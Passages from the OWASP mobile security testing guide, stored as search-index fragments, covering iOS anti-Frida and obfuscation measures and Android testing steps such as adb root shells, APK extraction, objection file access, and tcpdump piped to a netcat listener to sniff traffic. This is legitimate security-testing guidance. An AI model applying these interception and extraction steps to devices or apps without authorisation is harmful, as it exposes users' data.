iPhone:/var/containers/Bundle/Application/AC5DC1FD-3420-42F3-8CB5-E9D77C4B287A/SwiftSecurity.app/Frameworks root# ls -alh\ntotal 87M\ndrwxr-xr-x 10 _installd _installd 320 Nov 19 06:08 ./\ndrwxr-xr-x 11 _installd _installd 352 Nov 19 06:08 ../\n-rw-r--r-- 1 _installd _installd 70M Nov 16 06:37 FridaGadget.dylib\n-rw-r--r-- 1 _installd _installd 3.8M Nov 16 06:37 libswiftCore.dylib\n-rw-r--r-- 1 _installd _installd 71K Nov 16 06:37 libswiftCoreFoundation.dylib\n-rw-r--r-- 1 _installd _installd 136K Nov 16 06:38 libswiftCoreGraphics.dylib\n-rw-r--r-- 1 _installd _installd 99K Nov 16 06:37 libswiftDarwin.dylib\n-rw-r--r-- 1 _installd _installd 189K Nov 16 06:37 libswiftDispatch.dylib\n-rw-r--r-- 1 _installd _installd 1.9M Nov 16 06:38 libswiftFoundation.dylib\n-rw-r--r-- 1 _installd _installd 76K Nov 16 06:37 libswiftObjectiveC.dylib\n
Looking at these traces that Frida leaves behind, you might already imagine that detecting Frida would be a trivial task. And while it is trivial to detect these libraries, it is equally trivial to bypass such a detection. Detection of tools is a cat and mouse game and things can get much more complicated. The following table shortly presents a set of some typical Frida detection methods and a short discussion on their effectiveness.
Some of the following detection methods are implemented in the iOS Security Suite.
Method Description Discussion Check The Environment For Related Artifacts Artifacts can be packaged files, binaries, libraries, processes, and temporary files. For Frida, this could be the frida-server running in the target (jailbroken) system (the daemon responsible for exposing Frida over TCP) or the frida libraries loaded by the app. Inspecting running services is not possible for an iOS app on a non-jailbroken device. The Swift method CommandLine is not available on iOS to query for information about running processes, but there are unofficial ways, such as by using NSTask. Nevertheless when using this method, the app will be rejected during the App Store review process. There is no other public API available to query for running processes or execute system commands within an iOS App. Even if it would be possible, bypassing this would be as easy as just renaming the corresponding Frida artifact (frida-server/frida-gadget/frida-agent). Another way to detect Frida, would be to walk through the list of loaded libraries and check for suspicious ones (e.g. those including \"frida\" in their names), which can be done by using_dyld_get_image_name
. Checking For Open TCP Ports The frida-server process binds to TCP port 27042 by default. Testing whether this port is open is another method of detecting the daemon. This method detects frida-server in its default mode, but the listening port can be changed via a command line argument, so bypassing this is very trivial. Checking For Ports Responding To D-Bus Auth frida-server
uses the D-Bus protocol to communicate, so you can expect it to respond to D-Bus AUTH. Send a D-Bus AUTH message to every open port and check for an answer, hoping that frida-server
will reveal itself. This is a fairly robust method of detecting frida-server
, but Frida offers alternative modes of operation that don't require frida-server. Please remember that this table is far from exhaustive. For example, two other possible detection mechanisms are:
Both would help to detect Substrate or Frida's Interceptor but, for example, won't be effective against Frida's Stalker. Remember that the success of each of these detection methods will depend on whether you're using a jailbroken device, the specific version of the jailbreak and method and/or the version of the tool itself. At the end, this is part of the cat and mouse game of protecting data being processed on an uncontrolled environment (the end user's device).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#emulator-detection","title":"Emulator Detection","text":"The goal of emulator detection is to increase the difficulty of running the app on an emulated device. This forces the reverse engineer to defeat the emulator checks or utilize the physical device, thereby barring the access required for large-scale device analysis.
As discussed in the section Testing on the iOS Simulator in the basic security testing chapter, the only available simulator is the one that ships with Xcode. Simulator binaries are compiled to x86 code instead of ARM code and apps compiled for a real device (ARM architecture) don't run in the simulator, hence simulation protection was not so much a concern regarding iOS apps in contrast to Android with a wide range of emulation choices available.
However, since its release, Corellium (commercial tool) has enabled real emulation, setting itself apart from the iOS simulator. In addition to that, being a SaaS solution, Corellium enables large-scale device analysis with the limiting factor just being available funds.
With Apple Silicon (ARM) hardware widely available, traditional checks for the presence of x86 / x64 architecture might not suffice. One potential detection strategy is to identify features and limitations available for commonly used emulation solutions. For instance, Corellium doesn't support iCloud, cellular services, camera, NFC, Bluetooth, App Store access or GPU hardware emulation (Metal). Therefore, smartly combining checks involving any of these features could be an indicator for the presence of an emulated environment.
Pairing these results with the ones from 3rd party frameworks such as iOS Security Suite, Trusteer or a no-code solution such as Appdome (commercial solution) will provide a good line of defense against attacks utilizing emulators.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"The chapter \"Mobile App Tampering and Reverse Engineering\" introduces several well-known obfuscation techniques that can be used in mobile apps in general.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#name-obfuscation","title":"Name Obfuscation","text":"The standard compiler generates binary symbols based on class and function names from the source code. Therefore, if no obfuscation was applied, symbol names remain meaningful and can be easily read straight from the app binary. For instance, a function which detects a jailbreak can be located by searching for relevant keywords (e.g. \"jailbreak\"). The listing below shows the disassembled function JailbreakDetectionViewController.jailbreakTest4Tapped
from the Damn Vulnerable iOS App (DVIA-v2).
__T07DVIA_v232JailbreakDetectionViewControllerC20jailbreakTest4TappedyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
After the obfuscation we can observe that the symbol\u2019s name is no longer meaningful as shown on the listing below.
__T07DVIA_v232zNNtWKQptikYUBNBgfFVMjSkvRdhhnbyyFySbyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
Nevertheless, this only applies to the names of functions, classes and fields. The actual code remains unmodified, so an attacker can still read the disassembled version of the function and try to understand its purpose (e.g. to retrieve the logic of a security algorithm).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#instruction-substitution","title":"Instruction Substitution","text":"This technique replaces standard binary operators like addition or subtraction with more complex representations. For example an addition x = a + b
can be represented as x = -(-a) - (-b)
. However, using the same replacement representation could be easily reversed, so it is recommended to add multiple substitution techniques for a single case and introduce a random factor. This technique is vulnerable to deobfuscation, but depending on the complexity and depth of the substitutions, applying it can still be time consuming.
Control flow flattening replaces original code with a more complex representation. The transformation breaks the body of a function into basic blocks and puts them all inside a single infinite loop with a switch statement that controls the program flow. This makes the program flow significantly harder to follow because it removes the natural conditional constructs that usually make the code easier to read.
The image shows how control flow flattening alters code. See \"Obfuscating C++ programs via control flow flattening\" for more information.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#dead-code-injection","title":"Dead Code Injection","text":"This technique makes the program's control flow more complex by injecting dead code into the program. Dead code is a stub of code that doesn\u2019t affect the original program\u2019s behaviour but increases the overhead for the reverse engineering process.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#string-encryption","title":"String Encryption","text":"Applications are often compiled with hardcoded keys, licences, tokens and endpoint URLs. By default, all of them are stored in plaintext in the data section of an application\u2019s binary. This technique encrypts these values and injects stubs of code into the program that will decrypt that data before it is used by the program.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#recommended-tools","title":"Recommended Tools","text":"Learn more about iOS obfuscation techniques in the paper \"Protecting Million-User iOS Apps with Obfuscation: Motivations, Pitfalls, and Experience\".
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#device-binding","title":"Device Binding","text":"The purpose of device binding is to impede an attacker who tries to copy an app and its state from device A to device B and continue the execution of the app on device B. After device A has been determined trusted, it may have more privileges than device B. This situation shouldn't change when an app is copied from device A to device B.
Since iOS 7.0, hardware identifiers (such as MAC addresses) are off-limits but there are other methods for implementing device binding in iOS:
identifierForVendor
: You can use [[UIDevice currentDevice] identifierForVendor]
(in Objective-C), UIDevice.current.identifierForVendor?.uuidString
(in Swift3), or UIDevice.currentDevice().identifierForVendor?.UUIDString
(in Swift2). The value of identifierForVendor
may not be the same if you reinstall the app after other apps from the same vendor are installed and it may change when you update your app bundle's name. Therefore it is best to combine it with something in the Keychain.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
(if you want to secure the data and properly enforce a passcode or Touch ID requirement), kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
, or kSecAttrAccessibleWhenUnlockedThisDeviceOnly
.Any scheme based on these methods will be more secure the moment a passcode and/or Touch ID is enabled, the materials stored in the Keychain or filesystem are protected with protection classes (such as kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
and kSecAttrAccessibleWhenUnlockedThisDeviceOnly
), and the SecAccessControlCreateFlags
is set either with kSecAccessControlDevicePasscode
(for passcodes), kSecAccessControlUserPresence
(passcode, Face ID or Touch ID), kSecAccessControlBiometryAny
(Face ID or Touch ID) or kSecAccessControlBiometryCurrentSet
(Face ID / Touch ID: but current enrolled biometrics only).
One of the most common things you do when testing an app is accessing the device shell. In this section we'll see how to access the Android shell both remotely from your host computer with/without a USB cable and locally from the device itself.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#remote-shell","title":"Remote Shell","text":"In order to connect to the shell of an Android device from your host computer, adb is usually your tool of choice (unless you prefer to use remote SSH access, e.g. via Termux).
For this section we assume that you've properly enabled Developer Mode and USB debugging as explained in \"Testing on a Real Device\". Once you've connected your Android device via USB, you can access the remote device's shell by running:
adb shell\n
press Control + D or type exit
to quit
Once in the remote shell, if your device is rooted or you're using the emulator, you can get root access by running su
:
bullhead:/ $ su\nbullhead:/ # id\nuid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0\n
Only if you're working with an emulator you may alternatively restart adb with root permissions with the command adb root
so next time you enter adb shell
you'll have root access already. This also allows you to transfer data bidirectionally between your host computer and the Android file system, even with access to locations to which only the root user has access (via adb push/pull
). See more about data transfer in section \"Host-Device Data Transfer\" below.
If you have more than one device, remember to include the -s
flag followed by the device serial ID on all your adb
commands (e.g. adb -s emulator-5554 shell
or adb -s 00b604081540b7c6 shell
). You can get a list of all connected devices and their serial IDs by using the following command:
adb devices\nList of devices attached\n00c907098530a82c device\nemulator-5554 device\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#connect-to-a-device-over-wi-fi","title":"Connect to a Device over Wi-Fi","text":"You can also access your Android device without using the USB cable. For this you'll have to connect both your host computer and your Android device to the same Wi-Fi network and follow the next steps:
adb tcpip 5555
.adb connect <device_ip_address>
. Check that the device is now available by running adb devices
.adb shell
.However, notice that by doing this you leave your device open to anyone being in the same network and knowing the IP address of your device. You may rather prefer using the USB connection.
For example, on a Nexus device, you can find the IP address at Settings -> System -> About phone -> Status -> IP address or by going to the Wi-Fi menu and tapping once on the network you're connected to.
See the full instructions and considerations in the Android Developers Documentation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#connect-to-a-device-via-ssh","title":"Connect to a Device via SSH","text":"If you prefer, you can also enable SSH access. A convenient option is to use Termux, which you can easily configure to offer SSH access (with password or public key authentication) and start it with the command sshd
(starts by default on port 8022). In order to connect to the Termux via SSH you can simply run the command ssh -p 8022 <ip_address>
(where ip_address
 is the actual remote device IP). This option has some additional benefits as it allows you to access the file system via SFTP also on port 8022.
While usually using an on-device shell (terminal emulator) such as Termux might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or to check some configuration.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/","title":"Host-Device Data Transfer","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-adb","title":"Using adb","text":"You can copy files to and from a device by using the adb commands adb pull <remote> <local>
and adb push <local> <remote>
commands. Their usage is very straightforward. For example, the following will copy foo.txt
from your current directory (local) to the sdcard
folder (remote):
adb push foo.txt /sdcard/foo.txt\n
This approach is commonly used when you know exactly what you want to copy and from/to where and also supports bulk file transfer, e.g. you can pull (copy) a whole directory from the Android device to your host computer.
$ adb pull /sdcard\n/sdcard/: 1190 files pulled. 14.1 MB/s (304526427 bytes in 20.566s)\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-android-studio-device-file-explorer","title":"Using Android Studio Device File Explorer","text":"Android Studio has a built-in Device File Explorer which you can open by going to View -> Tool Windows -> Device File Explorer.
If you're using a rooted device you can now start exploring the whole file system. However, when using a non-rooted device accessing the app sandboxes won't work unless the app is debuggable and even then you are \"jailed\" within the app sandbox.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-objection","title":"Using objection","text":"This option is useful when you are working on a specific app and want to copy files you might encounter inside its sandbox (notice that you'll only have access to the files that the target app has access to). This approach works without having to set the app as debuggable, which is otherwise required when using Android Studio's Device File Explorer.
First, connect to the app with Objection as explained in \"Recommended Tools - Objection\". Then, use ls
and cd
as you normally would on your terminal to explore the available files:
$ frida-ps -U | grep -i owasp\n21228 sg.vp.owasp_mobile.omtg_android\n\n$ objection -g sg.vp.owasp_mobile.omtg_android explore\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # cd ..\n/data/user/0/sg.vp.owasp_mobile.omtg_android\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls\nType ... Name\n--------- ... -------------------\nDirectory ... cache\nDirectory ... code_cache\nDirectory ... lib\nDirectory ... shared_prefs\nDirectory ... files\nDirectory ... app_ACRA-approved\nDirectory ... app_ACRA-unapproved\nDirectory ... databases\n\nReadable: True Writable: True\n
Once you have a file you want to download you can just run file download <some_file>
. This will download that file to your working directory. The same way you can upload files using file upload
.
...[usb] # ls\nType ... Name\n------ ... -----------------------------------------------\nFile ... sg.vp.owasp_mobile.omtg_android_preferences.xml\n\nReadable: True Writable: True\n...[usb] # file download sg.vp.owasp_mobile.omtg_android_preferences.xml\nDownloading ...\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded ... to sg.vp.owasp_mobile.omtg_android_preferences.xml\n
The downside is that, at the time of this writing, objection does not support bulk file transfer yet, so you're restricted to copying individual files. Still, this can come in handy in some scenarios where you're already exploring the app using objection anyway and find some interesting file. Instead of for example taking note of the full path of that file and use adb pull <path_to_some_file>
from a separate terminal, you might just want to directly do file download <some_file>
.
There are several ways of extracting APK files from a device. You will need to decide which one is the easiest method depending if the app is public or private.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#alternative-app-stores","title":"Alternative App Stores","text":"One of the easiest options is to download the APK from websites that mirror public applications from the Google Play Store. However, keep in mind that these sites are not official and there is no guarantee that the application hasn't been repackaged or doesn't contain malware. A few reputable websites that host APKs and are not known for modifying apps and even list SHA-1 and SHA-256 checksums of the apps are:
Beware that you do not have control over these sites and you cannot guarantee what they do in the future. Only use them if it's your only option left.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#using-gplaycli","title":"Using gplaycli","text":"You can use gplaycli to download (-d
) the selected APK by specifying its AppID (add -p
to show a progress bar and -v
for verbosity):
$ gplaycli -p -v -d com.google.android.keep\n[INFO] GPlayCli version 3.26 [Python3.7.4]\n[INFO] Configuration file is ~/.config/gplaycli/gplaycli.conf\n[INFO] Device is bacon\n[INFO] Using cached token.\n[INFO] Using auto retrieved token to connect to API\n[INFO] 1 / 1 com.google.android.keep\n[################################] 15.78MB/15.78MB - 00:00:02 6.57MB/s/s\n[INFO] Download complete\n
The com.google.android.keep.apk
file will be in your current directory. As you might imagine, this approach is a very convenient way to download APKs, especially with regards to automation.
You may use your own Google Play credentials or token. By default, gplaycli will use an internally provided token.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#extracting-the-app-package-from-the-device","title":"Extracting the App Package from the Device","text":"Obtaining app packages from the device is the recommended method as we can guarantee the app hasn't been modified by a third-party. To obtain applications from a rooted or non-rooted device, you can use the following methods:
Use adb pull
to retrieve the APK. If you don't know the package name, the first step is to list all the applications installed on the device:
adb shell pm list packages\n
Once you have located the package name of the application, you need the full path where it is stored on the system to download it.
adb shell pm path <package name>\n
With the full path to the APK, you can now simply use adb pull
to extract it.
adb pull <apk path>\n
The APK will be downloaded in your working directory.
Alternatively, there are also apps like APK Extractor that do not require root and can even share the extracted APK via your preferred method. This can be useful if you don't feel like connecting the device or setting up adb over the network to transfer the file.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#testing-instant-apps","title":"Testing Instant Apps","text":"With Google Play Instant you can create Instant apps which can be instantly launched from a browser or the \"try now\" button from the app store from Android 5.0 (API level 21) onward. They do not require any form of installation. There are a few challenges with an instant app:
The combination of these can lead to insecure decisions, such as: stripping too much of the authorization/authentication/confidentiality logic from an app, which allows for information leakage.
Note: Instant apps require an App Bundle. App Bundles are described in the \"App Bundles\" section of the \"Android Platform Overview\" chapter.
Static Analysis Considerations:
Static analysis can be either done after reverse engineering a downloaded instant app, or by analyzing the App Bundle. When you analyze the App Bundle, check the Android Manifest to see whether dist:module dist:instant=\"true\"
is set for a given module (either the base or a specific module with dist:module
set). Next, check for the various entry points, which entry points are set (by means of <data android:path=\"</PATH/HERE>\" />
).
Now follow the entry points, like you would do for any Activity and check:
Dynamic Analysis Considerations:
There are multiple ways to start the dynamic analysis of your instant app. In all cases, you will first have to install the support for instant apps and add the ia
executable to your $PATH
.
The installation of instant app support is taken care of through the following command:
cd path/to/android/sdk/tools/bin && ./sdkmanager 'extras;google;instantapps'\n
Next, you have to add path/to/android/sdk/extras/google/instantapps/ia
to your $PATH
.
After the preparation, you can test instant apps locally on a device running Android 8.1 (API level 27) or later. The app can be tested in different ways:
Deploy as instant app
checkbox in the Run/Configuration dialog) or deploy the app using the following command:ia run output-from-build-command <app-artifact>\n
try now
button in the App store from the testers account.Now that you can test the app, check whether:
If you need to test on a non-jailbroken device you should learn how to repackage an app to enable dynamic testing on it.
Use a computer to perform all the steps indicated in the article \"Patching Android Applications\" from the objection Wiki. Once you're done you'll be able to patch an APK by calling the objection command:
objection patchapk --source app-release.apk\n
The patched application then needs to be installed using adb, as explained in \"Installing Apps\".
This repackaging method is enough for most use cases. For more advanced repackaging, refer to \"Android Tampering and Reverse Engineering - Patching, Repackaging and Re-Signing\".
"},{"location":"MASTG/techniques/android/MASTG-TECH-0005/","title":"Installing Apps","text":"Use adb install
to install an APK on an emulator or connected device.
adb install path_to_apk\n
Note that if you have the original source code and use Android Studio, you do not need to do this because Android Studio handles the packaging and installation of the app for you.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0006/","title":"Listing Installed Apps","text":"When targeting apps that are installed on the device, you'll first have to figure out the correct package name of the application you want to analyze. You can retrieve the installed apps either by using pm
(Android Package Manager) or by using frida-ps
:
$ adb shell pm list packages\npackage:sg.vantagepoint.helloworldjni\npackage:eu.chainfire.supersu\npackage:org.teamsik.apps.hackingchallenge.easy\npackage:org.teamsik.apps.hackingchallenge.hard\npackage:sg.vp.owasp_mobile.omtg_android\n
You can include flags to show only third party apps (-3
) and the location of their APK file (-f
), which you can use afterwards to download it via adb pull
:
$ adb shell pm list packages -3 -f\npackage:/data/app/sg.vantagepoint.helloworldjni-1/base.apk=sg.vantagepoint.helloworldjni\npackage:/data/app/eu.chainfire.supersu-1/base.apk=eu.chainfire.supersu\npackage:/data/app/org.teamsik.apps.hackingchallenge.easy-1/base.apk=org.teamsik.apps.hackingchallenge.easy\npackage:/data/app/org.teamsik.apps.hackingchallenge.hard-1/base.apk=org.teamsik.apps.hackingchallenge.hard\npackage:/data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk=sg.vp.owasp_mobile.omtg_android\n
This is the same as running adb shell pm path <app_package_id>
on an app package ID:
$ adb shell pm path sg.vp.owasp_mobile.omtg_android\npackage:/data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk\n
Use frida-ps -Uai
to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n----- ---------------------------------------- ---------------------------------------\n 766 Android System android\n21228 Attack me if u can sg.vp.owasp_mobile.omtg_android\n 4281 Termux com.termux\n - Uncrackable1 sg.vantagepoint.uncrackable1\n
Note that this also shows the PID of the apps that are running at the moment. Take a note of the \"Identifier\" and the PID if any as you'll need them afterwards.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/","title":"Exploring the App Package","text":"Once you have collected the package name of the application you want to target, you'll want to start gathering information about it. First, retrieve the APK as explained in \"Basic Testing Operations - Obtaining and Extracting Apps\".
APK files are actually ZIP files that can be unpacked using a standard decompression utility such as unzip
. However, we recommend using apktool which additionally decodes the AndroidManifest.xml and disassembles the app binaries (classes.dex) to smali code:
$ apktool d UnCrackable-Level3.apk\n$ tree\n.\n\u251c\u2500\u2500 AndroidManifest.xml\n\u251c\u2500\u2500 apktool.yml\n\u251c\u2500\u2500 lib\n\u251c\u2500\u2500 original\n\u2502 \u251c\u2500\u2500 AndroidManifest.xml\n\u2502 \u2514\u2500\u2500 META-INF\n\u2502 \u251c\u2500\u2500 CERT.RSA\n\u2502 \u251c\u2500\u2500 CERT.SF\n\u2502 \u2514\u2500\u2500 MANIFEST.MF\n\u251c\u2500\u2500 res\n...\n\u2514\u2500\u2500 smali\n
The following files are unpacked:
As unzipping with the standard unzip
utility leaves some files such as the AndroidManifest.xml
unreadable, it's better to unpack the APK using apktool.
$ ls -alh\ntotal 32\ndrwxr-xr-x 9 sven staff 306B Dec 5 16:29 .\ndrwxr-xr-x 5 sven staff 170B Dec 5 16:29 ..\n-rw-r--r-- 1 sven staff 10K Dec 5 16:29 AndroidManifest.xml\n-rw-r--r-- 1 sven staff 401B Dec 5 16:29 apktool.yml\ndrwxr-xr-x 6 sven staff 204B Dec 5 16:29 assets\ndrwxr-xr-x 3 sven staff 102B Dec 5 16:29 lib\ndrwxr-xr-x 4 sven staff 136B Dec 5 16:29 original\ndrwxr-xr-x 131 sven staff 4.3K Dec 5 16:29 res\ndrwxr-xr-x 9 sven staff 306B Dec 5 16:29 smali\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#the-android-manifest","title":"The Android Manifest","text":"The Android Manifest is the main source of information, it includes a lot of interesting information such as the package name, the permissions, app components, etc.
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the Android Manifest by just inspecting the file or by using grep -i <keyword> AndroidManifest.xml
:
permission
(see \"Android Platform APIs\")android:allowBackup
(see \"Data Storage on Androidactivity
, service
, provider
, receiver
(see \"Android Platform APIs\" and \"Data Storage on Androiddebuggable
(see \"Code Quality and Build Settings of Android Apps\")Please refer to the mentioned chapters to learn more about how to test each of these points.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#app-binary","title":"App Binary","text":"The app binary (classes.dex
) can be found in the root directory of the app package. It is a so-called DEX (Dalvik Executable) file that contains compiled Java code. Due to its nature, after applying some conversions you'll be able to use a decompiler to produce Java code. We've also seen the folder smali
that was obtained after we run apktool. This contains the disassembled Dalvik bytecode in an intermediate language called smali, which is a human-readable representation of the Dalvik executable.
Refer to the section \"Reviewing Decompiled Java Code\" in the chapter \"Tampering and Reverse Engineering on Android\" for more information about how to reverse engineer DEX files.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#compiled-app-binary","title":"Compiled App Binary","text":"In some cases it might be useful to retrieve the compiled app binary (.odex).
First get the path to the app's data directory:
adb shell pm path com.example.myapplication\npackage:/data/app/~~DEMFPZh7R4qfUwwwh1czYA==/com.example.myapplication-pOslqiQkJclb_1Vk9-WAXg==/base.apk\n
Remove the /base.apk
part, add /oat/arm64/base.odex
and use the resulting path to pull the base.odex from the device:
adb root\nadb pull /data/app/~~DEMFPZh7R4qfUwwwh1czYA==/com.example.myapplication-pOslqiQkJclb_1Vk9-WAXg==/oat/arm64/base.odex\n
Note that the exact directory will be different based on your Android version. If the /oat/arm64/base.odex
file can't be found, manually search in the directory returned by pm path
.
You can inspect the lib
folder in the APK:
$ ls -1 lib/armeabi/\nlibdatabase_sqlcipher.so\nlibnative.so\nlibsqlcipher_android.so\nlibstlport_shared.so\n
or from the device with objection:
...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls lib\nType ... Name\n------ ... ------------------------\nFile ... libnative.so\nFile ... libdatabase_sqlcipher.so\nFile ... libstlport_shared.so\nFile ... libsqlcipher_android.so\n
For now this is all information you can get about the native libraries unless you start reverse engineering them, which is done using a different approach than the one used to reverse the app binary as this code cannot be decompiled but only disassembled. Refer to the section \"Reviewing Disassemble Native Code\" in the chapter \"Tampering and Reverse Engineering on Android\" for more information about how to reverse engineer these libraries.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#other-app-resources","title":"Other App Resources","text":"It is normally worth taking a look at the rest of the resources and files that you may find in the root folder of the APK as sometimes they contain additional goodies like key stores, encrypted databases, certificates, etc.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0008/","title":"Accessing App Data Directories","text":"Once you have installed the app, there is further information to explore, where tools like objection come in handy.
When using objection you can retrieve different kinds of information, where env
will show you all the directory information of the app.
$ objection -g sg.vp.owasp_mobile.omtg_android explore\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # env\n\nName Path\n---------------------- ---------------------------------------------------------------------------\ncacheDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/cache\ncodeCacheDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/code_cache\nexternalCacheDirectory /storage/emulated/0/Android/data/sg.vp.owasp_mobile.omtg_android/cache\nfilesDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/files\nobbDir /storage/emulated/0/Android/obb/sg.vp.owasp_mobile.omtg_android\npackageCodePath /data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk\n
Among this information we find:
/data/data/[package-name]
or /data/user/0/[package-name]
/storage/emulated/0/Android/data/[package-name]
or /sdcard/Android/data/[package-name]
/data/app/
The internal data directory is used by the app to store data created during runtime and has the following basic structure:
...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls\nType ... Name\n--------- ... -------------------\nDirectory ... cache\nDirectory ... code_cache\nDirectory ... lib\nDirectory ... shared_prefs\nDirectory ... files\nDirectory ... databases\n\nReadable: True Writable: True\n
Each folder has its own purpose:
However, the app might store more data not only inside these folders but also in the parent folder (/data/data/[package-name]
).
Refer to the \"Testing Data Storage\" chapter for more information and best practices on securely storing sensitive data.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0009/","title":"Monitoring System Logs","text":"On Android you can easily inspect the log of system messages by using Logcat
. There are two ways to execute Logcat:
adb logcat > logcat.log\n
With the following command you can specifically grep for the log output of the app in scope, just insert the package name. Of course your app needs to be running for ps
to be able to get its PID.
adb logcat | grep \"$(adb shell ps | grep <package-name> | awk '{print $2}')\"\n
If you already know the app PID you may give it directly using --pid
flag.
You may also want to apply further filters or regular expressions (using logcat
's regex flags -e <expr>, --regex=<expr>
for example) if you expect certain strings or patterns to come up in the logs.
Remotely sniffing all Android traffic in real-time is possible with tcpdump, netcat (nc), and Wireshark. First, make sure that you have the latest version of Android tcpdump on your phone. Here are the installation steps:
adb root\nadb remount\nadb push /wherever/you/put/tcpdump /system/xbin/tcpdump\n
If execution of adb root
returns the error adbd cannot run as root in production builds
, install tcpdump as follows:
adb push /wherever/you/put/tcpdump /data/local/tmp/tcpdump\nadb shell\nsu\nmount -o rw,remount /system;\ncp /data/local/tmp/tcpdump /system/xbin/\ncd /system/xbin\nchmod 755 tcpdump\n
In certain production builds, you might encounter an error mount: '/system' not in /proc/mounts
.
In that case, you can replace the above line $ mount -o rw,remount /system;
with $ mount -o rw,remount /
, as described in this Stack Overflow post.
Remember: To use tcpdump, you need root privileges on the phone!
Execute tcpdump
once to see if it works. Once a few packets have come in, you can stop tcpdump by pressing CTRL+c.
$ tcpdump\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes\n04:54:06.590751 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n04:54:09.659658 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n04:54:10.579795 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n^C\n3 packets captured\n3 packets received by filter\n0 packets dropped by kernel\n
To remotely sniff the Android phone's network traffic, first execute tcpdump
and pipe its output to netcat
(nc):
tcpdump -i wlan0 -s0 -w - | nc -l -p 11111\n
The tcpdump command above involves
-
, which will make tcpdump write to stdout.By using the pipe (|
), we sent all output from tcpdump to netcat, which opens a listener on port 11111. You'll usually want to monitor the wlan0 interface. If you need another interface, list the available options with the command $ ip addr
.
To access port 11111, you need to forward the port to your host computer via adb.
adb forward tcp:11111 tcp:11111\n
The following command connects you to the forwarded port via netcat and piping to Wireshark.
nc localhost 11111 | wireshark -k -S -i -\n
Wireshark should start immediately (-k). It gets all data from stdin (-i -) via netcat, which is connected to the forwarded port. You should see all the phone's traffic from the wlan0 interface.
You can display the captured traffic in a human-readable format with Wireshark. Figure out which protocols are used and whether they are unencrypted. Capturing all traffic (TCP and UDP) is important, so you should execute all functions of the tested application and analyze it.
This neat little trick allows you now to identify what kind of protocols are used and to which endpoints the app is talking to. The questions is now, how can I test the endpoints if Burp is not capable of showing the traffic? There is no easy answer for this, but a few Burp plugins that can get you started.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#firebasegoogle-cloud-messaging-fcmgcm","title":"Firebase/Google Cloud Messaging (FCM/GCM)","text":"Firebase Cloud Messaging (FCM), the successor to Google Cloud Messaging (GCM), is a free service offered by Google that allows you to send messages between an application server and client apps. The server and client app communicate via the FCM/GCM connection server, which handles downstream and upstream messages.
Downstream messages (push notifications) are sent from the application server to the client app; upstream messages are sent from the client app to the server.
FCM is available for Android, iOS, and Chrome. FCM currently provides two connection server protocols: HTTP and XMPP. As described in the official documentation, these protocols are implemented differently. The following example demonstrates how to intercept both protocols.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#preparation-of-test-setup","title":"Preparation of Test Setup","text":"You need to either configure iptables on your phone or use bettercap to be able to intercept traffic.
FCM can use either XMPP or HTTP to communicate with the Google backend.
